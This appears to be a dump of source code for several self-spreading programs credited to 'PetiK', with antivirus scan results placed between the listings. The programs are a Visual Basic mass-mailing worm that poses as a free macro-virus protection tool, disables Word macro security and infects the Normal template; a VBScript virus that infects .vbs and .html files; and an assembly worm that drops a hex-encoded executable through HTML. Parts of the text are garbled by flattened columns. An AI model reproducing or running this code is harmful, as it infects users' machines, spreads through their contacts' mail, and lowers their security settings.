Symantec  1.4.4.12  2009.05.16
TheHacker  6.3.4.1.326  2009.05.15
TrendMicro  8.950.0.1092  2009.05.15
VBA32  3.12.10.5  2009.05.16
ViRobot  2009.5.15.1737  2009.05.15
VirusBuster  4.6.5.0  2009.05.16

Result: Email-Worm.Win32.Mars!IK | Win32/Mars.worm.12800 | Worm/Mars.3 | Worm/Win32.Win32 | W32/Gubed.A@mm | Win32:Gubed | I-Worm/Mars | Win32.Mars.B@mm | I-Worm.Mars | Worm.Mars | Worm.Win32.Mars.A | Win32.HLLM.Generic.61 | Win32.Mars | Win32/Gubed | W32/Gubed.A@mm | Email-Worm.Win32.Mars | W32/Gubed.A@mm | Win32.Mars.B@mm | Email-Worm.Win32.Mars | Email-Worm.Win32.Mars | Email-Worm.Win32.Mars | W32/Gubed@MM | W32/Gubed@MM | Worm.Mars.3 | Worm:Win32/Gubed.A@mm | Win32/Mars.A | Gubed.A@mm | Worm Generic | Email-Worm.Mars!sd5 | High Risk Worm | Worm.Mail.Mars.a | W32/Mars-A | Email-Worm.Win32.Magistr.a.poly | W32.Gubed.int | Trojan/Hami | WORM_GUBED.A | Email-Worm.Win32.Mars | I-Worm.Win32.Mars.12800 | I-Worm.Petgub.A

Additional information
File size: 12800 bytes
MD5...: 1b81a0863eafb1a4b260df5c7c1d8621
SHA1..: 7c218fa9d30d54966f472e6703123d13e38152f1
PEiD..: Crypto-Lock v2.02 (Eng) -> Ryan Thian


Name     : W32.HLLW.DocTor
Author   : PetiK
Language : Visual Basic
Date     : 22/06/2002

Attribute VB_Name = "Module1"

Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
Private Declare Function GetCommandLine Lib "kernel32" Alias "GetCommandLineA" () As Long
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long
Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

Const CSIDL_STARTUP = &H7

Private Type SHITEMID
    cb As Long
    abID As Byte
End Type

Private Type ITEMIDLIST
    mkid As SHITEMID
End Type

Public docv As String

Sub Main()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
org = App.Path & "\" & App.EXEName & ".exe"
If InStr(1, GetCommLine, "/newrun") = 0 Then
    docv = "C:\"
    Randomize (Timer)
    For i = 1 To 8
        docv = docv & Chr(Int(Rnd(1) * 26) + 97)
    Next i
    docv = docv & ".txt"
    Call Install
    Call DocVir
    Call VbsDrop
Else
    Sleep 20000
    DeleteFile GetSpecialfolder(CSIDL_STARTUP) & "\doctor.vbs"
chkinet:
    If InternetGetConnectedState(0&, 0&) = 0 Then GoTo chkinet
    Set out = CreateObject("Outlook.Application")
    Set map = out.GetNameSpace("MAPI")
    If out = "Outlook" Then
        map.Logon "profile", "password"
        For y = 1 To map.AddressLists.Count
            Set z = map.AddressLists(y)
            x = 1
            Set mel = out.CreateItem(0)
            For oo = 1 To z.AddressEntries.Count
                e = z.AddressEntries(x)
                ml.Recipients.Add e
                x = x + 1
                If x < 500 Then oo = z.AddressEntries.Count
            Next oo
            mel.Subject = "NewTool for Word Macro Virus"
            mel.Body = "This tool allows you to protect you against unknown macro virus." & vbCrLf & _
                "Click on the attached file to run this freeware." & vbCrLf & vbCrLf & _
                "Best Regards. Have a nice day"
            mel.Attachments.Add orig, 1, 1, "DocTor.exe"
            mel.Send
            e = ""
        Next y
        map.Logoff
    End If
End If
End Sub

Sub Install()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
org = App.Path & "\" & App.EXEName & ".exe"
cop = fso.GetSpecialfolder(0) & "\Doctor.exe"
copreg = fso.GetSpecialfolder(0) & "\Doctor.exe /newrun"
FileCopy org, cop
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DocTor", copreg
End Sub

Sub DocVir()
On Error Resume Next
Dim lngbufferlen
Dim bbyte As Byte
Dim pefile As String
orig = App.Path & "\" & App.EXEName & ".exe"
Open orig For Binary As #1
DoEvents
Do While Not EOF(1)
    DoEvents
    Get #1, , bbyte
    e = Hex(bbyte)
    If Len(e) = 1 Then e = "0" & Hex(bbyte)
    pefile = pefile & e
Loop
Close #1
hexf = "pef = """
For i = 1 To Len(pefile) Step 110
    hexf = hexf & Mid(pefile, i, 110) & """" & vbCrLf & "pef = pef & """
Next
hexf = hexf & """" & vbCrLf
inst = "read = dec(pef)" & vbCrLf & _
    "Set r = fso.CreateTextFile(fso.GetSpecialFolder(0) & ""\Doctor.exe"", 2)" & vbCrLf & _
    "r.Write read" & vbCrLf & _
    "r.Close" & vbCrLf & _
    "ws.RegWrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DocTor"", fso.GetSpecialFolder(0) & ""\Doctor.exe /newrun"""
conv = "Function dec(octe)" & vbCrLf & _
    "On Error Resume Next" & vbCrLf & _
    "For hexad = 1 To Len(octe) Step 2" & vbCrLf & _
    "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))" & vbCrLf & _
    "Next" & vbCrLf & _
    "End Function" & vbCrLf
infwrd = "Set doc = ActiveDocument.VBProject.VBComponents(1)" & vbCrLf & _
    "Set nor = NormalTemplate.VBProject.VBComponents(1)" & vbCrLf & _
    "With Options" & vbCrLf & _
    ".ConfirmConversions = False" & vbCrLf & _
    ".VirusProtection = False" & vbCrLf & _
    ".SaveNormalPrompt = False" & vbCrLf & _
    "End With" & vbCrLf & _
    "Select Case Application.Version" & vbCrLf & _
    "Case ""10.0""" & vbCrLf & _
    "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&" & vbCrLf & _
    "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&" & vbCrLf & _
    "Case ""9.0""" & vbCrLf & _
    "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&" & vbCrLf & _
    "End Select" & vbCrLf & _
    "WordBasic.DisableAutoMacros 0" & vbCrLf & vbCrLf & _
    "If nor.Name <> ""DocTor"" Then"
infwrd2 = "install doc, nor" & vbCrLf & _
    "End If" & vbCrLf & _
    "If doc.Name <> ""DocTor"" Then" & vbCrLf & _
    "install nor, doc" & vbCrLf & _
    "Activedocument.Save" & vbCrLf & _
    "End If"
instal = "Private Sub install(src, dst)" & vbCrLf & _
    "Set odst = dst.CodeModule" & vbCrLf & _
    "Set osrc = src.CodeModule" & vbCrLf & _
    "odst.DeleteLines 1, odst.CountOfLines" & vbCrLf & _
    "odst.InsertLines 1, osrc.Lines(1, osrc.CountOfLines)" & vbCrLf & _
    "End Sub" & vbCrLf
Open docv For Output As #1
Print #1, "Private Sub Document_Open()"
Print #1, "On Error Resume Next"
Print #1, "Set fso=CreateObject(""Scripting.FileSystemObject"")"
Print #1, "Set ws=CreateObject(""WScript.Shell"")" & vbCrLf
Print #1, hexf
Print #1, infwrd
Print #1, inst
Print #1, infwrd2
Print #1, "End Sub" & vbCrLf
Print #1, instal
Print #1, conv
Close #1
End Sub

Sub VbsDrop()
On Error Resume Next
vbsdrp = GetSpecialfolder(CSIDL_STARTUP) & "\doctor.vbs"
vbs = "On Error Resume Next" & vbCrLf & _
    "set fso=createobject(""scripting.filesystemobject"")" & vbCrLf & _
    "set ws=createobject(""wscript.shell"")" & vbCrLf & _
    "Set wrd=createObject(""Word.Application"")" & vbCrLf & _
    "wrd.options.virusprotection=0" & vbCrLf & _
    "wrd.options.savenormalprompt=0" & vbCrLf & _
    "wrd.options.confirmconversions=0" & vbCrLf & _
    "ws.regwrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level"",1,""REG_DWORD""" & vbCrLf & _
    "ws.regwrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level"",1,""REG_DWORD""" & vbCrLf & _
    "ws.regwrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM"",1,""REG_DWORD""" & vbCrLf & _
    "If wrd.normaltemplate.vbproject.vbcomponents(1).name <> ""DocTor"" then" & vbCrLf & _
    "wrd.normaltemplate.vbproject.vbcomponents(1).codemodule.addfromfile(""" & docv & """)" & vbCrLf & _
    "wrd.normaltemplate.vbproject.vbcomponents(1).name=""DocTor""" & vbCrLf & _
    "End If" & vbCrLf & _
    "wscript.sleep 500" & vbCrLf & _
    "fso.deletefile """ & docv & """" & vbCrLf & _
    "wrd.application.quit"
Open vbsdrp For Output As #1
Print #1, vbs
Close #1
End Sub

Private Function GetCommLine() As String
Dim RetStr As Long, SLen As Long
Dim Buffer As String
RetStr = GetCommandLine

SLen = lstrlen(RetStr) If SLen > 0 Then GetCommLine = Space$(SLen) CopyMemory ByVal GetCommLine, ByVal RetStr, SLen End If End Function Private Function GetSpecialfolder(CSIDL As Long) As String Dim r As Long Dim IDL As ITEMIDLIST r = SHGetSpecialFolderLocation(100, CSIDL, IDL) If r = NOERROR Then Path$ = Space$(512) r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$) GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1) Exit Function End If GetSpecialfolder = "" End Function

VBA Word Part Attribute VBA_ModuleType=VBADocumentModule Sub ThisDocument Private Sub Document_Open() On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") pef pef pef pef pef pef = = = = = = "4D5A900000000000..." pef & "0000000000C00000..." pef & "53206D6F64652E0D..." pef & "2AAA88526963689D..." pef & "00000000000000" pef & ""

Set doc = ActiveDocument.VBProject.VBComponents(1) Set nor = NormalTemplate.VBProject.VBComponents(1) With Options .ConfirmConversions = False .VirusProtection = False .SaveNormalPrompt = False End With Select Case Application.Version Case "10.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1& Case "9.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& End Select WordBasic.DisableAutoMacros 0 If nor.Name <> "DocTor" Then read = dec(pef) Set r = fso.CreateTextFile(fso.GetSpecialFolder(0) & "\Doctor.exe", 2) r.Write read r.Close ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DocTor", fso.GetSpecialFolder(0) & "\Doctor.exe /newrun" install doc, nor End If If doc.Name <> "DocTor" Then install nor, doc ActiveDocument.Save End If End Sub Private Sub install(src, dst) Set odst = dst.CodeModule Set osrc = src.CodeModule odst.DeleteLines 1, odst.CountOfLines odst.InsertLines 1, osrc.Lines(1, osrc.CountOfLines) End Sub Function dec(octe) On Error Resume Next For hexad = 1 To Len(octe) Step 2 dec = dec & Chr("&h" & Mid(octe, hexad, 2)) Next End Function

End Sub

File DocTor.exe received on 05.16.2009 11:30:42 (CET)

Antivirus           Version          Last Update
a-squared           4.0.0.101        2009.05.16
AhnLab-V3           5.0.0.2          2009.05.15
AntiVir             7.9.0.168        2009.05.15
Antiy-AVL           2.0.3.1          2009.05.15
Authentium          5.1.2.4          2009.05.15
Avast               4.8.1335.0       2009.05.15
AVG                 8.5.0.336        2009.05.15
BitDefender         7.2              2009.05.16
CAT-QuickHeal       10.00            2009.05.15
ClamAV              0.94.1           2009.05.15
Comodo              1157             2009.05.08
DrWeb               5.0.0.12182      2009.05.16
eSafe               7.0.17.0         2009.05.14
eTrust-Vet          31.6.6508        2009.05.16
F-Prot              4.4.4.56         2009.05.15
F-Secure            8.0.14470.0      2009.05.15
Fortinet            3.117.0.0        2009.05.16
GData               19               2009.05.16
Ikarus              T3.1.1.49.0      2009.05.16
K7AntiVirus         7.10.735         2009.05.14
Kaspersky           7.0.0.125        2009.05.16
McAfee              5616             2009.05.15
McAfee+Artemis      5616             2009.05.15
McAfee-GW-Edition   6.7.6            2009.05.15
Microsoft           1.4602           2009.05.16
NOD32               4080             2009.05.15
Norman              6.01.05          2009.05.16
nProtect            2009.1.8.0       2009.05.16
Panda               10.0.0.14        2009.05.15
PCTools             4.4.2.0          2009.05.15
Prevx               3.0              2009.05.16
Rising              21.29.52.00      2009.05.16
Sophos              4.41.0           2009.05.16
Sunbelt             3.2.1858.2       2009.05.16
Symantec            1.4.4.12         2009.05.16
TheHacker           6.3.4.1.326      2009.05.15
TrendMicro          8.950.0.1092     2009.05.15
VBA32               3.12.10.5        2009.05.16
ViRobot             2009.5.15.1737   2009.05.15
VirusBuster         4.6.5.0          2009.05.15

Result: Email-Worm.Win32.Dotor!IK Win32/Dotor.worm.11776 Worm/Dotor.1 Worm/Win32.Win32 W32/Dotor.A Win32:Dotor I-Worm/Dotor Win32.Dotor.A@mm I-Worm.Dotor Worm.Dotor Worm.Win32.DoTor.A Win32.HLLM.Generic.62 Win32.Doctor Win32/Dotor W32/Dotor.A Email-Worm.Win32.Dotor W32/Dotor.A!worm Win32.Dotor.A@mm Email-Worm.Win32.Dotor Email-Worm.Win32.Dotor Email-Worm.Win32.Dotor W32/DoTor@MM W32/DoTor@MM Worm.Doctor.4 Worm:Win32/Dotor.A@mm Win32/DoTor.A Dotor.A@mm W32/Dotor.A Email-Worm.Dotor!sd5 High Risk Cloaked Malware Worm.Mail.Dotor.a W32/Dotor-A W32.Dotor.A@mm W32.Dotor.A@mm W32/Dotor WORM_DOTOR.A Email-Worm.Win32.Dotor I-Worm.Pettor.A

Additional information
File size: 11776 bytes
MD5...: 76ff0b311e26f1322c63023c30c54549
SHA1..: 143baa09884c13cd59eb048f756954e5a6d2bc6d
PEiD..: Crypto-Lock v2.02 (Eng) -> Ryan Thian

File DocTor.doc received on 05.16.2009 11:30:41 (CET)

Antivirus           Version          Last Update
a-squared           4.0.0.101        2009.05.16
AhnLab-V3           5.0.0.2          2009.05.15
AntiVir             7.9.0.168        2009.05.15
Antiy-AVL           2.0.3.1          2009.05.15
Authentium          5.1.2.4          2009.05.15
Avast               4.8.1335.0       2009.05.15
AVG                 8.5.0.336        2009.05.15
BitDefender         7.2              2009.05.16
CAT-QuickHeal       10.00            2009.05.15
ClamAV              0.94.1           2009.05.15
Comodo              1157             2009.05.08
DrWeb               5.0.0.12182      2009.05.16
eSafe               7.0.17.0         2009.05.14
eTrust-Vet          31.6.6508        2009.05.16
F-Prot              4.4.4.56         2009.05.15
F-Secure            8.0.14470.0      2009.05.15
Fortinet            3.117.0.0        2009.05.16
GData               19               2009.05.16
Ikarus              T3.1.1.49.0      2009.05.16
K7AntiVirus         7.10.735         2009.05.14
Kaspersky           7.0.0.125        2009.05.16
McAfee              5616             2009.05.15
McAfee+Artemis      5616             2009.05.15
McAfee-GW-Edition   6.7.6            2009.05.15
Microsoft           1.4602           2009.05.16
NOD32               4080             2009.05.15
Norman              6.01.05          2009.05.16
nProtect            2009.1.8.0       2009.05.16
Panda               10.0.0.14        2009.05.15
PCTools             4.4.2.0          2009.05.15
Prevx               3.0              2009.05.16
Rising              21.29.52.00      2009.05.16
Sophos              4.41.0           2009.05.16
Sunbelt             3.2.1858.2       2009.05.16
Symantec            1.4.4.12         2009.05.16
TheHacker           6.3.4.1.326      2009.05.15
TrendMicro          8.950.0.1092     2009.05.15
VBA32               3.12.10.5        2009.05.16
ViRobot             2009.5.15.1737   2009.05.15
VirusBuster         4.6.5.0          2009.05.15

Result: Email-Worm.VBS.Lee.Based!IK W97M/Dotor W2000M/Bumdoc.A Worm/Win32.Dotor W97M/Dotor.A MW97:Dotor-A W97M/Bumdoc W97M.Dotor.A W97M.Ethan WM.Pivis W97M.Doctor O97M.GNinducc W97M/Dotor.A W97M/Dotor.A Email-Worm.Win32.Dotor W97M/Dotor.A W97M.Dotor.A Email-Worm.VBS.Lee.Based Email-Worm.Win32.Dotor W97M/Generic W97M/Generic Macro.Bumdoc.A Virus:W97M/Dotor.A W97M/Dotor.A W97M/Dotor.A W97M.Dotor.A W97M/Dotor.A WORD.97.Pettor.A Unknown Micro Virus WM97/Dotor-A W97M.Dotor.A (v) W97M.Dotor.A@mm W2KM/Generico W97M_DOTOR.A Email-Worm.Win32.Dotor W97M.Dotor.A WORD.97.Pettor.A

Additional information
File size: 77312 bytes
MD5...: 762645157dbc893c564928edfed2413b
SHA1..: 66a67434fd6e3771666e4adaa28fd9b481f2b4bc

' Name : VBS.Park
' Author : PetiK
' Language : VBS
' Date : 24/06/2002

On Error Resume Next Set fs=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set fl=fs0.OpenTextFile(WScript.ScriptFullName,1) virus=fl.ReadAll fl.Close f="virhex=""" For i=1 to Len(virus) e=Mid(virus,i,1) e=Hex(Asc(e)) If Len(e)=1 Then e="0"&e End If f=f & e Next f=f & """" On Error Resume Next For each drv in fs.Drives If drv.DriveType=2 or drv.DriveType=3 Then list(drv.path&"\") End If Next Sub list(dir) On Error Resume Next For each ssf in fs.GetFolder(dir).SubFolders infect(ssf.path) list(ssf.path) Next End Sub Sub infect(dir) For each fil in fs.GetFolder(dir).Files ext=lcase(fs.GetExtensionName(fil.path)) If ext="vbs" Then Set vb=fs.OpenTextFile(Q.path,1) If vb.ReadLine <> ""'VBS.Park"" Then vbsorg=vb.ReadAll() vb.Close Set vb=fs.OpenTextFile(Q.path,2) vb.WriteLine read(virhex) vb.WriteLine vbsorg vb.Close Else vb.Close End If ElseIf ext="htm" or ext="html" Then Set ht=fs.OpentextFile(P.path,1) htmf=ht.ReadAll ht.Close If InStr(1,htmf,"virhex",1) = 0 Then Set ht=fs.OpentextFile(P.path,8) ht.WriteBlankLines(2) ht.WriteLine "<SCRIPT LANGUAGE=VBScript>" ht.WriteLine "Set fs=CreateObject(""Scripting.FileSystemObject"")" ht.WriteLine "Set ws=CreateObject(""WScript.Shell"")" ht.WriteLine f ht.WriteLine "Infect(fso.GetSpecialFolder(0))" ht.WriteLine "Infect(fso.GetSpecialFolder(1))" ht.WriteLine "Infect(fso.GetSpecialFolder(2))" ht.WriteLine "Infect(""C:\"")" ht.WriteLine "Infect(ws.SpecialFolders(""MyDocuments""))"

ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.Close End If End If Next End Sub

"Infect(ws.SpecialFolders(""Desktop""))" "Infect(ws.SpecialFolders(""Favorites""))" "Sub Infect(dir)" "For each Q in fs.GetFolder(dir).Files" "ext=lcase(fs.GetExtensionName(Q.Name))" "If ext=""vbs"" Then" "Set vb=fs.OpenTextFile(Q.path,1)" "If vb.ReadLine <> ""'VBS.Park"" Then" "vbsorg=vb.ReadAll()" "vb.Close" "Set vb=fs.OpenTextFile(Q.path,2)" "vb.WriteLine read(virhex)" "vb.WriteLine vbsorg" "vb.Close" "Else" "vb.Close" "End If" "End If" "If ext=""htm"" or ext=""html"" Then" "Set ht=fs.OpenTextFile(Q.Path,1)" "If ht.ReadLine <> ""<vbshtmpark>"" Then" "htmorg=ht.ReadAll()" "ht.Close" "Set ht=fs.CreateTextFile(Q.Path,2)" "ht.WriteLine ""<vbshtmpark>""" "ht.Write(htmorg)" "ht.WriteLine document.body.CreateTextRange.htmltext" "ht.Close" "Else" "ht.Close" "End If" "End If" "Next" "End Sub" "Function read(octet)" "For hexa=1 To Len(octet) Step 2" "read=read & Chr(""&h"" & Mid(octet, hexa, 2))" "Next" "End Function" "</SCRIPT>"

File Park.vbs received on 05.16.2009 18:00:31 (CET)

Antivirus           Version          Last Update
a-squared           4.0.0.101        2009.05.16
AhnLab-V3           5.0.0.2          2009.05.16
AntiVir             7.9.0.168        2009.05.15
Antiy-AVL           2.0.3.1          2009.05.15
Authentium          5.1.2.4          2009.05.16
Avast               4.8.1335.0       2009.05.15
AVG                 8.5.0.336        2009.05.15
BitDefender         7.2              2009.05.16
CAT-QuickHeal       10.00            2009.05.15
ClamAV              0.94.1           2009.05.16
Comodo              1157             2009.05.08
DrWeb               5.0.0.12182      2009.05.16
eSafe               7.0.17.0         2009.05.14
eTrust-Vet          31.6.6508        2009.05.16
F-Prot              4.4.4.56         2009.05.16
F-Secure            8.0.14470.0      2009.05.15
Fortinet            3.117.0.0        2009.05.16
GData               19               2009.05.16
Ikarus              T3.1.1.49.0      2009.05.16
K7AntiVirus         7.10.737         2009.05.16
Kaspersky           7.0.0.125        2009.05.16
McAfee              5616             2009.05.15
McAfee+Artemis      5616             2009.05.15
McAfee-GW-Edition   6.7.6            2009.05.15
Microsoft           1.4602           2009.05.16
NOD32               4080             2009.05.15
Norman              6.01.05          2009.05.16
nProtect            2009.1.8.0       2009.05.16
Panda               10.0.0.14        2009.05.16
PCTools             4.4.2.0          2009.05.16
Prevx               3.0              2009.05.16
Rising              21.29.52.00      2009.05.16
Sophos              4.41.0           2009.05.16
Sunbelt             3.2.1858.2       2009.05.16
Symantec            1.4.4.12         2009.05.16
TheHacker           6.3.4.1.326      2009.05.15
TrendMicro          8.950.0.1092     2009.05.15
VBA32               3.12.10.5        2009.05.16
ViRobot             2009.5.15.1737   2009.05.15
VirusBuster         4.6.5.0          2009.05.16

Result: Virus.VBS.Petik!IK VBS/Park Worm/Alcaul.U3 Virus/VBS.VBS VBS/Park.A VBS:Malware-gen VBS/Park VBS.Park.A Unclassified Malware VBS.Generic.42 VBS/Park!intended VBS/Park.A Virus.VBS.Petik VBS/Petik.A VBS.Park.A Virus.VBS.Petik Virus.VBS.Petik VBS/Park.b.intd VBS/Park.b.intd Worm.Alcaul.U3 Virus:VBS/Park.gen probably unknown SCRIPT VBS/Petik.H VBS.Intended.Park.A VBS.Park.A VBS.Dara Junk/Park-A VBS.Dara VBS_Parade.a Virus.VBS.Petik VBS.Park VBS.Park.A

Additional information
File size: 3107 bytes
MD5...: cfa6d1d7f6e6223bfdf9ae6350cc05b0
SHA1..: 8d988bc367ce0b20adcc177f2b73764a233d77cb

comment *
Name : Worm.dilan aka adlin aka linda
Author : PetiK
Date : June 26th 2002
Language : win32asm
Spreads via an HTML file and infects other HTM/HTML files in these folders:
WINDOWS
WINDOWS\SYSTEM
WINDOWS\TEMP
DESKTOP
MY DOCUMENTS
*
.586p .model flat .code JUMPS include useful.inc include win32api.inc api endm start: pushad @SEH_SetupFrame get_name: push mov push push api <jmp end_worm> macro a extrn a:proc call a

50 esi,offset orgwrm esi 0 GetModuleFileNameA

get_copy_name: mov edi,offset cpywrm push edi push 50 push edi api GetWindowsDirectoryA add edi,eax mov eax,'acs\' stosd mov eax,'renn' stosd mov eax,'exe.' stosd pop edi copy_worm: push push push api 0 edi esi CopyFileA

push 50 push edi push 1 @pushsz "ScanW32" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA push push push push push push 0 0 3 0 1 80000000h

push api inc je dec xchg push push push push push push api test je xchg push push push push push api test je xchg push push api mov scan_mail: xor mov push p_c:

offset cpywrm CreateFileA eax end_worm eax ebx,eax 0 0 0 2 0 ebx CreateFileMappingA eax,eax end_w1 eax,ebp 0 0 0 4 ebp MapViewOfFile eax,eax end_w2 eax,esi 0 ebx GetFileSize [size],eax

edx,edx edi,offset hex_f edi lodsb call conv_hex stosw car_s: dec size cmp size,0 jne p_c entr1: xor al,al stosb pop edi f_mail: end_w3: push esi api UnmapViewOfFile end_w2: push ebp api CloseHandle end_w1: push ebx api CloseHandle push 0 push 5 push offset mydoc push 0 api SHGetSpecialFolderPathA @pushsz "\dilan.htm" push offset mydoc api lstrcat push 0 push 80h push 2 push 0 push 1 push 40000000h push offset mydoc api CreateFileA mov [hhtm],eax push 0 push offset byte push e_htm - s_htm push offset s_htm push [hhtm] api WriteFile push [hhtm]

api

CloseHandle

end_worm: @SEH_RemoveFrame popad push 0 api ExitProcess conv_hex: PUSH ECX PUSH EDI XOR ECX, ECX MOV CL, AL PUSH ECX SHR CL, 04h LEA EDI, Tab_Hex INC CL @@Y: INC EDI DEC CL JNZ @@Y DEC MOV POP AND LEA INC EDI AL, BYTE PTR [EDI] ECX CL, 0Fh EDI, Tab_Hex CL

@@X: INC EDI DEC CL JNZ @@X DEC MOV POP POP RET EDI AH, BYTE PTR [EDI] EDI ECX

.data orgwrm db 50 dup (0) cpywrm db 50 dup (0) mydoc db 70 dup (0) hhtm dd ? byte dd 0 size dd ? Tab_Hex db "0123456789ABCDEF", 00h s_htm: db '<dilan>',CRLF db '<html><head><title>Only For You!</title></head><body>',CRLF db '<script language=vbscript>',CRLF db 'On Error Resume Next',CRLF db 'Set fso=createobject("scripting.filesystemobject")',CRLF db 'Set ws=createobject("wscript.shell")',CRLF db 'If err.number=429 then',CRLF db 'document.write "<font face size=''4'' color=black>You need ActiveX enabled to see this file<br>' db '<a href=''javascript:location.reload()''>Click Here</a> to reload and CLICK YES</font>"',CRLF db 'Else',CRLF db 'asmhex="' hex_f db 1024 * 13 dup (0) db '"',CRLF db 'read = dec(asmhex)',CRLF db 'Set r = fso.CreateTextFile(fso.GetSpecialFolder(0)&"\scanner.exe", 2)',CRLF db 'r.Write read',CRLF db 'r.Close',CRLF db 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanW32",fso.GetSpecialFolder(0)&"\sc anner.exe"',CRLF,CRLF db 'infect(fso.GetSpecialFolder(0))',CRLF

'infect(fso.GetSpecialFolder(1))',CRLF 'infect(fso.GetSpecialFolder(2))',CRLF 'infect(ws.SpecialFolders("MyDocuments"))',CRLF 'infect(ws.SpecialFolders("Desktop"))',CRLF,CRLF 'MsgBox "Sorry but your browser can''t read this Web file."',CRLF 'End If',CRLF,CRLF 'Function infect(dir)',CRLF 'If fso.FolderExists(dir) Then',CRLF 'For each cible in fso.GetFolder(dir).Files',CRLF 'ext=lcase(fso.GetExtensionName(cible.Name))',CRLF 'If ext="htm" or ext="html" Then',CRLF 'Set gd=fso.OpenTextFile(cible.path,1)',CRLF 'If gd.readline <> "<dilan>" Then',CRLF 'htmorg=gd.Readall',CRLF 'gd.Close',CRLF 'Set gd=fso.OpenTextFile(cible.path,2)',CRLF 'gd.WriteLine "<dilan>"',CRLF 'gd.Write(htmorg)',CRLF 'gd.WriteLine document.body.createtextrange.htmltext',CRLF 'gd.Close',CRLF 'Else',CRLF 'gd.Close',CRLF 'End If',CRLF 'End If',CRLF 'Next',CRLF 'End If',CRLF 'End Function',CRLF,CRLF 'Function dec(octe)',CRLF 'On Error Resume Next',CRLF 'For hexad = 1 To Len(octe) Step 2',CRLF 'dec = dec & Chr("&h" & Mid(octe, hexad, 2))',CRLF 'Next',CRLF db 'End Function',CRLF db '</script></body></html>',CRLF e_htm: ends end

db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db

start

DILAN.HTM <dilan> <html><head><title>Only For You!</title></head><body> <script language=vbscript> On Error Resume Next Set fso=createobject("scripting.filesystemobject") Set ws=createobject("wscript.shell") If err.number=429 then document.write "<font face size='4' color=black>You need ActiveX enabled to see this file<br><a href='javascript:location.reload()'>Click Here</a> to reload and CLICK YES</font>" Else asmhex="4D5A50000200000004000F00FFFF..." read = dec(asmhex) Set r = fso.CreateTextFile(fso.GetSpecialFolder(0)&"\scanner.exe", 2) r.Write read r.Close ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanW32",fso.GetSpecialFolder(0)&"\sc anner.exe" infect(fso.GetSpecialFolder(0)) infect(fso.GetSpecialFolder(1)) infect(fso.GetSpecialFolder(2)) infect(ws.SpecialFolders("MyDocuments")) infect(ws.SpecialFolders("Desktop")) MsgBox "Sorry but your browser can't read this Web file." End If Function infect(dir) If fso.FolderExists(dir) Then For each cible in fso.GetFolder(dir).Files ext=lcase(fso.GetExtensionName(cible.Name)) If ext="htm" or ext="html" Then Set gd=fso.OpenTextFile(cible.path,1) If gd.readline <> "<dilan>" Then

htmorg=gd.Readall gd.Close Set gd=fso.OpenTextFile(cible.path,2) gd.WriteLine "<dilan>" gd.Write(htmorg) gd.WriteLine document.body.createtextrange.htmltext gd.Close Else gd.Close End If End If Next End If End Function Function dec(octe) On Error Resume Next For hexad = 1 To Len(octe) Step 2 dec = dec & Chr("&h" & Mid(octe, hexad, 2)) Next End Function </script></body></html>

File Dilan.exe received on 05.16.2009 11:30:36 (CET)

Antivirus           Version          Last Update
a-squared           4.0.0.101        2009.05.16
AhnLab-V3           5.0.0.2          2009.05.15
AntiVir             7.9.0.168        2009.05.15
Antiy-AVL           2.0.3.1          2009.05.15
Authentium          5.1.2.4          2009.05.15
Avast               4.8.1335.0       2009.05.15
